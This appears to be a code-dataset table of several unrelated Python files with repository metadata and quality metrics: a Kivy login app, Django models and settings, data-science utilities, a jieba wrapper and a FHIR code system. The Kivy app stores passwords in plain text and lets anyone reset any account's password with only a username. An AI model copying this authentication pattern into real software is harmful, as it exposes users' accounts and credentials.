hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
745ec4a1a4107300db6c0b26707d8947baa091a5 | 496 | py | Python | reproschema/models/utils.py | sanuann/reproschema-py | ece78068b185018ec3d7f56ef9498e6e366d1e70 | [
"Apache-2.0"
] | 3 | 2020-06-22T06:58:46.000Z | 2021-04-19T03:59:47.000Z | reproschema/models/utils.py | sanuann/reproschema-py | ece78068b185018ec3d7f56ef9498e6e366d1e70 | [
"Apache-2.0"
] | 10 | 2020-07-02T08:56:21.000Z | 2021-08-03T15:38:25.000Z | reproschema/models/utils.py | Remi-Gau/reproschema-py | 9597b24d0a63210508911d152f1e94175138c32e | [
"Apache-2.0"
] | 3 | 2020-06-21T19:28:40.000Z | 2020-07-03T06:53:08.000Z | import json
from . import Protocol, Activity, Item
def load_schema(filepath):
with open(filepath) as fp:
data = json.load(fp)
if "@type" not in data:
raise ValueError("Missing @type key")
schema_type = data["@type"]
if schema_type == "reproschema:Protocol":
return Protocol.from_data(data)
if schema_type == "reproschema:Activity":
return Activity.from_data(data)
if schema_type == "reproschema:Item":
return Item.from_data(data)
| 29.176471 | 45 | 0.66129 | 64 | 496 | 5 | 0.390625 | 0.125 | 0.1125 | 0.215625 | 0.21875 | 0.21875 | 0.21875 | 0 | 0 | 0 | 0 | 0 | 0.227823 | 496 | 16 | 46 | 31 | 0.835509 | 0 | 0 | 0 | 0 | 0 | 0.167339 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
746d29172dee4f61bf3ed0d46737bb7c9c82633b | 5,358 | py | Python | main.py | abhinav8797/Mobile_App | b0ba324c5cde7ef29ac515d9fad8a5b52eeb2ffb | [
"MIT"
] | null | null | null | main.py | abhinav8797/Mobile_App | b0ba324c5cde7ef29ac515d9fad8a5b52eeb2ffb | [
"MIT"
] | null | null | null | main.py | abhinav8797/Mobile_App | b0ba324c5cde7ef29ac515d9fad8a5b52eeb2ffb | [
"MIT"
] | null | null | null | from kivy.app import App
from kivy.lang import Builder
from kivy.uix.screenmanager import ScreenManager, Screen
import json, glob
from datetime import datetime
from pathlib import Path
import random
from hoverable import HoverBehavior
from kivy.uix.image import Image
from kivy.uix.behaviors import ButtonBehavior
Builder.load_file('design.kv')
class LoginScreen(Screen):
def login(self,uname,pword):
if uname == '' or pword == '':
self.ids.login_wrong.text="username and password are required"
else:
with open("users.json") as file:
user = json.load(file)
if uname in user and user[uname]['password']==pword:
self.manager.current="success_login_screen"
self.ids.username.text=""
self.ids.password.text=""
self.ids.login_wrong.text=""
else:
self.ids.login_wrong.text="Wrong username or password!"
self.ids.username.text=""
self.ids.password.text=""
def forgot_pass(self):
self.manager.current="forgot_pass_screen"
self.ids.login_wrong.text=""
def signup(self):
self.manager.current="sign_up_screen"
self.ids.login_wrong.text=""
class SignUpScreen(Screen):
def add_user(self,uname,pword):
if uname == '' or pword == '':
self.ids.detailsrequired.text="username and password are required"
else:
with open("users.json") as file:
users = json.load(file)
if uname in users:
self.ids.detailsrequired.text="username alredy exits"
self.ids.username.text=""
self.ids.password.text=""
else:
users[uname]={'username':uname,'password':pword,'created':datetime.now().strftime("%Y-%m-%d %H-%M-%S")}
with open("users.json",'w') as file:
json.dump(users,file)
self.manager.current="signup_success_screen"
self.ids.username.text=""
self.ids.password.text=""
self.ids.detailsrequired.text=""
#def login(self,uname,pword,detail):
def login(self):
self.manager.current="login_screen"
self.ids.username.text=""
self.ids.password.text=""
self.ids.detailsrequired.text=""
class SignUpSuccessScreen(Screen):
def go_to_login(self):
self.manager.transition.direction="right"
self.manager.current="login_screen"
class ForgotPasswordScreen(Screen):
def passchange(self,uname,npword,cpword):
if uname == '' or npword == '' or cpword == '':
self.ids.username_wrong.text="username and password are required"
#print(uname,npword,cpword)
else:
with open("users.json") as file:
user = json.load(file)
if uname in user and npword==cpword:
user[uname]={'password':npword}
with open("users.json",'w') as file:
json.dump(user,file)
self.manager.current="pass_change_screen"
self.ids.uname.text = ""
self.ids.newpass.text = ""
#print("erase")
self.ids.cpass.text = ""
#print("hello world")
self.ids.username_wrong.text=""
else:
self.ids.username_wrong.text="Wrong username or password doesn't matched"
self.ids.uname.text = ""
self.ids.newpass.text = ""
#print("hello worldll")
self.ids.cpass.text = ""
def login(self):
self.manager.current="login_screen"
self.ids.username_wrong.text=""
self.ids.uname.text=""
self.ids.newpass.text=""
self.ids.cpass.text=""
class SuccessLoginScreen(Screen):
def logout(self,feel):
self.manager.transition.direction="right"
#print(feel)
self.manager.current="login_screen"
self.ids.feeling.text = ""
self.ids.quote.text=""
def get_quote(self, feel):
feel = feel.lower()
available_feelings = glob.glob("quotes/*txt")
available_feelings = [Path(filename).stem for filename in available_feelings]
#print(available_feelings)
#print(feel)
if feel == '':
self.ids.quote.text="Enter your feeling "
elif feel in available_feelings:
with open(f"quotes/{feel}.txt",encoding="utf8") as file:
quotes = file.readlines()
#print(quotes)
self.ids.quote.text = random.choice(quotes)
else:
self.ids.quote.text ="Try another Feeling"
self.ids.feeling.text=""
class ImageButton(ButtonBehavior,HoverBehavior,Image):
pass
class PasswordChangeScreen(Screen):
def login(self):
self.manager.current="login_screen"
class RootWidget(ScreenManager):
pass
class MainApp(App):
def build(self):
return RootWidget()
if __name__ == "__main__":
MainApp().run()
| 33.911392 | 120 | 0.557484 | 582 | 5,358 | 5.058419 | 0.216495 | 0.090353 | 0.05231 | 0.028872 | 0.466033 | 0.380774 | 0.320313 | 0.293139 | 0.241848 | 0.169837 | 0 | 0.000277 | 0.326055 | 5,358 | 157 | 121 | 34.127389 | 0.81501 | 0.034528 | 0 | 0.470588 | 0 | 0 | 0.109469 | 0.004195 | 0 | 0 | 0 | 0 | 0 | 1 | 0.10084 | false | 0.226891 | 0.084034 | 0.008403 | 0.268908 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
7474b68b83f436dbeac054b6ef77bbb2f04f040e | 4,001 | py | Python | detecting_poverty/utils.py | ryanmwebb/detecting_poverty | 74974e6a35891e7a063bf6b611b23d4ba75ad013 | [
"MIT"
] | 1 | 2021-05-29T13:59:02.000Z | 2021-05-29T13:59:02.000Z | detecting_poverty/utils.py | ryanmwebb/detecting_poverty | 74974e6a35891e7a063bf6b611b23d4ba75ad013 | [
"MIT"
] | null | null | null | detecting_poverty/utils.py | ryanmwebb/detecting_poverty | 74974e6a35891e7a063bf6b611b23d4ba75ad013 | [
"MIT"
] | 2 | 2021-03-21T18:38:47.000Z | 2021-09-04T20:28:01.000Z | import torch
import numpy as np
from PIL import Image
import random
import math
import seaborn as sns
from sklearn import metrics
import matplotlib.pyplot as plt
def adjusted_classes(y_scores, threshold):
"""
This function adjusts class predictions based on the prediction threshold (t).
Will only work for binary classification problems.
Inputs:
y_scores (1D array): Values between 0 and 1.
threshold (float): probability threshold
Returns:
array of 0s and 1s
"""
return (y_scores >= threshold).astype(int)
def confusion_matrix(Ytrue, Ypred):
"""
Display a color weighted confusion matrix for binary classification.
"""
sns.heatmap(metrics.confusion_matrix(Ytrue, Ypred), annot=True)
plt.ylabel("True Label")
plt.xlabel("Predicted Label")
plt.show()
def roc_auc(model, Xtest, Ytest):
"""
Display the ROC curve.
"""
metrics.plot_roc_curve(model, Xtest, Ytest)
plt.show()
def precision_recall(model, Xtest, Ytest):
"""
Display the Precision-Recall curve.
"""
metrics.plot_precision_recall_curve(model, Xtest, Ytest)
plt.show()
class LatLonBBDraw():
'''
A callable class to provide random samples of fixed size bounding
boxes from within a larger (super) bounding box.
'''
def __init__(self, lat_range, lon_range, dimension):
"""
Create parameters for sampling function.
Inputs:
lat_range (tuple of two floats): north and south boundaries
of super bounding box.
lon_range (tuple of two floats): west and east boundaries.
dimension (float): width (and height) in degrees of desired bounding
box sub samples.
"""
self.lat_range = lat_range
self.lon_range = lon_range
self.dimension = dimension
def __call__(self):
"""
Returns:
A length 4 tuple of floats: (west, south, east, north)
"""
lat = random.uniform(self.lat_range[0], self.lat_range[1])
lon = random.uniform(self.lon_range[0], self.lon_range[1])
return (lon, lat, lon+self.dimension, lat+self.dimension)
class LatLonDraw():
'''
A callable class to provide random samples of lat/lon pairs
from within a bounding box.
'''
def __init__(self, lat_range, lon_range):
"""
Create parameters for sampling function.
Inputs:
lat_range (tuple of two floats): north and south boundaries
of super bounding box.
lon_range (tuple of two floats): west and east boundaries.
"""
self.lat_range = lat_range
self.lon_range = lon_range
def __call__(self):
"""
Returns:
A length 2 tuple of floats: (lat, lon)
"""
lat = random.uniform(self.lat_range[0], self.lat_range[1])
lon = random.uniform(self.lon_range[0], self.lon_range[1])
return (lon, lat)
def resize(digits, row_size, column_size):
"""
Resize images from input scale to row-size x clumn_size
@row_size,column_size : scale_size intended to be
"""
return np.array(
[
np.array(Image.fromarray(_).resize((row_size, column_size)))
for _ in digits
]
)
def gen_solution(test_lst, fname):
"""
Generate csv file for Kaggle submission
------
:in:
test_lst: 1d array of (n_data), predicted test labels
fname: string, name of output file
"""
heads = ['Id', 'Category']
with open(fname, 'w') as fo:
fo.write(heads[0] + ',' + heads[1] + '\n')
for ind in range(len(test_lst)):
fo.write(heads[0] + ' ' + str(ind + 1) + ',' + str(test_lst[ind]) + '\n')
def create_space(lat, lon, s=10):
"""Creates a s km x s km square centered on (lat, lon)"""
v = (180/math.pi)*(500/6378137)*s # roughly 0.045 for s=10
return lat - v, lon - v, lat + v, lon + v
| 29.858209 | 85 | 0.613347 | 529 | 4,001 | 4.506616 | 0.336484 | 0.040268 | 0.040268 | 0.025168 | 0.369128 | 0.348154 | 0.30453 | 0.30453 | 0.272651 | 0.240772 | 0 | 0.014246 | 0.28068 | 4,001 | 134 | 86 | 29.858209 | 0.814107 | 0.388403 | 0 | 0.240741 | 0 | 0 | 0.020653 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.203704 | false | 0 | 0.148148 | 0 | 0.481481 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
74812779d8c48fa896cdffccf52a934b0eca18b3 | 3,433 | py | Python | api/models.py | jjkivai/SolutionsWeb | c80d63784b90776d7506c98d5c96ad100ee08d67 | [
"MIT"
] | null | null | null | api/models.py | jjkivai/SolutionsWeb | c80d63784b90776d7506c98d5c96ad100ee08d67 | [
"MIT"
] | null | null | null | api/models.py | jjkivai/SolutionsWeb | c80d63784b90776d7506c98d5c96ad100ee08d67 | [
"MIT"
] | null | null | null | from django.db import models
# Helper functions
def project_cover(instance, filename):
return "Project_{0}/cover_{1}".format(instance.id, filename)
def project_image(instance, filename):
return "Project_{0}/image_{1}".format(instance.project.id, filename)
def client_logo(instance, filename):
return "ClientLogos/{0}".format(filename)
def license_images(instance, filename):
return "Licences/{0}".format(filename)
# Create your models here.
class Project(models.Model):
title = models.CharField(
"Title",
help_text="Title of the project",
max_length=64,
null=False,
blank=False,
)
cover_image = models.ImageField(
"Cover Image",
upload_to=project_cover,
blank=False,
null=False,
help_text="Project cover image",
)
short_description = models.CharField(
"Short Description",
help_text="Example: Renovations and upgrades",
max_length=32,
blank=True,
null=False,
default="",
)
description = models.TextField(
"Project Description",
help_text="Overview of the project, written in markdown",
blank=False,
null=False,
)
details = models.TextField(
"Project Details",
help_text="Details about the project, including specifics",
null=False,
blank=False,
)
def __str__(self) -> str:
return self.title
def __repr__(self) -> str:
return self.title
class ProjectImage(models.Model):
project = models.ForeignKey(
to=Project,
on_delete=models.CASCADE,
blank=False,
null=False,
related_name="images",
)
text = models.CharField(
"Project Image Text",
help_text="A title for the image",
default="Project Image",
max_length=32,
)
image = models.ImageField("Project Image", upload_to=project_image)
class Client(models.Model):
client_image = models.ImageField("Client Logo", upload_to=client_logo)
company = models.CharField(
"Company Name",
max_length=64,
null=False,
blank=False,
default="",
help_text="Name of company",
)
def __str__(self) -> str:
return str(self.company)
def __repr__(self) -> str:
return self.company
class License(models.Model):
license_image = models.ImageField("License Photo", upload_to=license_images)
name = models.CharField(
"License Title",
max_length=64,
null=False,
blank=False,
default="Solutions License",
help_text="Title of license to be displayed",
)
def __str__(self) -> str:
return self.name
def __repr__(self) -> str:
return self.name
class Message(models.Model):
first_name = models.CharField("First Name", null=False, blank=False, max_length=32)
last_name = models.CharField("Last Name", null=False, blank=False, max_length=32)
company = models.CharField("Company", null=False, blank=False, max_length=32)
email = models.EmailField("Email", blank=False, null=False)
message = models.TextField("Message", max_length=200)
def __str__(self) -> str:
return "Message from{0} {1}".format(self.last_name, self.first_name)
def __repr__(self) -> str:
return "Message from{0} {1}".format(self.last_name, self.first_name) | 26.820313 | 87 | 0.633557 | 403 | 3,433 | 5.205955 | 0.210918 | 0.051478 | 0.049571 | 0.063394 | 0.259295 | 0.212107 | 0.15062 | 0.122021 | 0.054337 | 0.054337 | 0 | 0.011284 | 0.251384 | 3,433 | 128 | 88 | 26.820313 | 0.805058 | 0.011943 | 0 | 0.356436 | 0 | 0 | 0.164602 | 0.012389 | 0 | 0 | 0 | 0 | 0 | 1 | 0.118812 | false | 0 | 0.009901 | 0.118812 | 0.465347 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
748a825397bd0e9314a447970d621e66d1ce7f06 | 2,386 | py | Python | html_extract/jieba_call.py | xinyi-Z/HtmlExtract-Python | d4cc12231739f3ac521d12a8e83fdf12b829fa70 | [
"MIT"
] | 6 | 2017-03-08T09:30:39.000Z | 2019-10-23T09:47:53.000Z | html_extract/jieba_call.py | xinyi-spark/HtmlExtract-Python | d4cc12231739f3ac521d12a8e83fdf12b829fa70 | [
"MIT"
] | null | null | null | html_extract/jieba_call.py | xinyi-spark/HtmlExtract-Python | d4cc12231739f3ac521d12a8e83fdf12b829fa70 | [
"MIT"
] | 1 | 2020-04-26T09:44:30.000Z | 2020-04-26T09:44:30.000Z | # -*- coding: utf-8 -*-
'''
Name: jieba库调用
Author:XinYi 609610350@qq.com
Time:2016.3
'''
import jieba.analyse
import jieba
def cut_all(data):
'''
采用全模式分词,即把句子中所有的可以成词的词语都扫描出来
来到北京大学-->来到/北京/北京大学/大学
'''
temp_result = jieba.cut(data, cut_all=True)
temp_result = '/'.join(temp_result)
return temp_result
def cut_accurate(data):
'''
采用精准模式分词,试图把句子精确切开
来到北京大学-->来到/北京大学
'''
temp_result = jieba.cut(data, cut_all=False)
# temp_result = '/'.join(temp_result)
return temp_result
def cut_search(data):
'''
采用搜索引擎模式分词,在精确模式的基础上,对长词再次切分,
来到北京大学-->来到/北京/大学/北京大学
'''
temp_result = jieba.cut_for_search(data)
temp_result = '/'.join(temp_result)
return temp_result
def add_word_dict(word, freq=None, tag=None):
'''
向词典中添加新单词
'''
jieba.add_word(word, freq=None, tag=None)
def del_word_dict(word):
'''
向词典中删除单词
'''
jieba.del_word(word)
def jieba_textrank(data, topK=20, withWeight=False, allowPOS=('nz', 'nt', 'ns', 'nr', 'n', 'vn')):
'''
利用textrank获取文本的关键词,topK设置为返回的关键词个数,默认为20个
withWeight设置是否按权值由大到小的顺序返回
allowPOS设置返回的词性
'''
keyword_list = []
for w in jieba.analyse.textrank(data, topK=20, withWeight=True, allowPOS=allowPOS):
keyword_list.append(w[0])
keyword = '/'.join(keyword_list)
return keyword
def jieba_POS_tagging(data, allowPOS=('nz', 'nt', 'ns', 'nr', 'n', 'vn')):
'''
对data分词后提取词性,并通过allowPOS过滤词性后返回分词结果
'''
segs = jieba.posseg.cut(data)
temp_result = []
for w in segs:
if w.flag[0] in allowPOS:
temp_result.append(w.word)
temp_result = '/'.join(temp_result)
return temp_result
def jieba_tfidf(data, topK=20, withWeight=False, allowPOS=('nz', 'nt', 'ns', 'nr', 'n', 'vn')):
'''
使用tfidf获取文本的关键词,topK设置为返回的关键词个数,默认为20个
withWeight设置是否按权值由大到小的顺序返回
allowPOS设置返回的词性
'''
temp_result = jieba.analyse.extract_tags(
data, topK, withWeight, allowPOS)
temp_result = '/'.join(temp_result)
return temp_result
if __name__ == '__main__':
# print cut_all('来到北京大学')
# print cut_search('来到北京大学')
# print cut_accurate('来到北京大学')
# print get_keyword('来到北京大学', topK=2, withWeight=True)
print jieba_POS_tagging('淘宝网 - 淘!我喜欢') | 24.346939 | 99 | 0.615675 | 283 | 2,386 | 4.992933 | 0.321555 | 0.14862 | 0.04954 | 0.063694 | 0.34041 | 0.269639 | 0.269639 | 0.216561 | 0.188252 | 0.127389 | 0 | 0.015453 | 0.24057 | 2,386 | 98 | 100 | 24.346939 | 0.764349 | 0.079631 | 0 | 0.236842 | 0 | 0 | 0.037549 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.052632 | null | null | 0.026316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
748ade9671cc9b1a53d8a53adc42d40e0c798ebd | 2,930 | py | Python | oops_fhir/r4/code_system/v3_hl7_context_conduction_style.py | Mikuana/oops_fhir | 77963315d123756b7d21ae881f433778096a1d25 | [
"MIT"
] | null | null | null | oops_fhir/r4/code_system/v3_hl7_context_conduction_style.py | Mikuana/oops_fhir | 77963315d123756b7d21ae881f433778096a1d25 | [
"MIT"
] | null | null | null | oops_fhir/r4/code_system/v3_hl7_context_conduction_style.py | Mikuana/oops_fhir | 77963315d123756b7d21ae881f433778096a1d25 | [
"MIT"
] | null | null | null | from pathlib import Path
from fhir.resources.codesystem import CodeSystem
from oops_fhir.utils import CodeSystemConcept
__all__ = ["v3HL7ContextConductionStyle"]
_resource = CodeSystem.parse_file(Path(__file__).with_suffix(".json"))
class v3HL7ContextConductionStyle:
"""
v3 Code System HL7ContextConductionStyle
The styles of context conduction usable by relationships within a static
model derived from tyhe HL7 Reference Information Model.
Status: active - Version: 2018-08-12
Copyright None
http://terminology.hl7.org/CodeSystem/v3-HL7ContextConductionStyle
"""
c = CodeSystemConcept(
{
"code": "C",
"definition": "Definition: Context conduction is defined using the contextConductionCode and contextConductionInd attributes on ActRelationship and Participation.\r\n\n \n UsageNotes: This approach is deprecated as of March, 2010.",
"display": "conduction-indicator-based",
}
)
"""
conduction-indicator-based
Definition: Context conduction is defined using the contextConductionCode and contextConductionInd attributes on ActRelationship and Participation.
UsageNotes: This approach is deprecated as of March, 2010.
"""
i = CodeSystemConcept(
{
"code": "I",
"definition": 'Definition: Context conduction is not explicitly defined. The recipient of an instance must infer conduction based on the semantics of the model and what is deemed "reasonable".\r\n\n \n UsageNotes: Because this approach can lead to variation in instance interpretation, its use is discouraged.',
"display": "inferred",
}
)
"""
inferred
Definition: Context conduction is not explicitly defined. The recipient of an instance must infer conduction based on the semantics of the model and what is deemed "reasonable".
UsageNotes: Because this approach can lead to variation in instance interpretation, its use is discouraged.
"""
v = CodeSystemConcept(
{
"code": "V",
"definition": 'Definition: Context conduction is defined using the ActRelationship.blockedContextActRelationshipType and blockedContextParticipationType attributes and the "conductible" property on the ActRelationshipType and ParticipationType code systems.',
"display": "vocabulary-based",
}
)
"""
vocabulary-based
Definition: Context conduction is defined using the ActRelationship.blockedContextActRelationshipType and blockedContextParticipationType attributes and the "conductible" property on the ActRelationshipType and ParticipationType code systems.
"""
class Meta:
resource = _resource
| 39.594595 | 373 | 0.675768 | 287 | 2,930 | 6.853659 | 0.376307 | 0.060498 | 0.082359 | 0.08846 | 0.664972 | 0.655821 | 0.655821 | 0.655821 | 0.640569 | 0.592781 | 0 | 0.012037 | 0.262799 | 2,930 | 73 | 374 | 40.136986 | 0.898611 | 0.105461 | 0 | 0 | 0 | 0.103448 | 0.605215 | 0.09339 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.103448 | 0 | 0.275862 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7490be062bf8f49932d88edf6304cbe160d7101a | 1,484 | py | Python | matplotlib_widget.py | kkgg0521/-Oscilloscope-host-computer | 2035ef5a2ccb26b563425dab560ee8002aade413 | [
"MIT"
] | null | null | null | matplotlib_widget.py | kkgg0521/-Oscilloscope-host-computer | 2035ef5a2ccb26b563425dab560ee8002aade413 | [
"MIT"
] | null | null | null | matplotlib_widget.py | kkgg0521/-Oscilloscope-host-computer | 2035ef5a2ccb26b563425dab560ee8002aade413 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
@Time : 2022/1/11 14:30
@Auth : 吕伟康
@File :matplotlib_widget.py
"""
# -*- coding: utf-8 -*-
"""
@Time : 2021/12/15 10:52
@Auth : 吕伟康
@File :matplotlib_widget.py
"""
import numpy as np
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import QWidget, QVBoxLayout
from matplotlib.backends.backend_qt5 import NavigationToolbar2QT as NavigationToolbar
from gui.Widget.Diag_oscillograph_new.Figure import MyMplCanvas
class MatPlotLibWidget(QWidget):
def __init__(self, parent=None):
super(MatPlotLibWidget, self).__init__(parent)
self.init()
time_test = QTimer(self)
time_test.timeout.connect(self.updatanarray)
# time_test.start(500)
self.a = [1,2,3]
def updatanarray(self):
'''数据源 '''
self.set_narry_xdata(self.a)
self.set_narry_ydata(self.a)
def init(self):
self.layout = QVBoxLayout(self)
self.mpl = MyMplCanvas(self, width=5, height=4, dpi=100)
self.mpl_ntb = NavigationToolbar(self.mpl, self)
self.layout.addWidget(self.mpl)
self.layout.addWidget(self.mpl_ntb)
def set_narry_xdata(self, newvalue):
self.mpl.set_narry_xdata(newvalue)
def set_narry_ydata(self, newvalue):
self.mpl.set_narry_ydata(newvalue)
def close_updata(self):
self.mpl.close_updata()
def start_updata(self):
'''开启刷新'''
self.mpl.start_updata() | 28 | 86 | 0.643531 | 189 | 1,484 | 4.873016 | 0.412698 | 0.068404 | 0.042345 | 0.030402 | 0.178067 | 0.121607 | 0 | 0 | 0 | 0 | 0 | 0.035273 | 0.235849 | 1,484 | 53 | 87 | 28 | 0.776896 | 0.093666 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.241379 | false | 0 | 0.172414 | 0 | 0.448276 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
74919c44ebaafcbfd0dc0243217b7977319b1e97 | 247 | py | Python | tests/django_app/settings.py | Menda/factory-boy-loader | f45504195df5b805a5a5ebde210dfd7ee1bd6939 | [
"MIT"
] | null | null | null | tests/django_app/settings.py | Menda/factory-boy-loader | f45504195df5b805a5a5ebde210dfd7ee1bd6939 | [
"MIT"
] | null | null | null | tests/django_app/settings.py | Menda/factory-boy-loader | f45504195df5b805a5a5ebde210dfd7ee1bd6939 | [
"MIT"
] | null | null | null | """
Settings for tests.
"""
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'example.sqlite',
},
}
INSTALLED_APPS = [
'tests.django_app'
]
MIDDLEWARE_CLASSES = ()
SECRET_KEY = 'testing.'
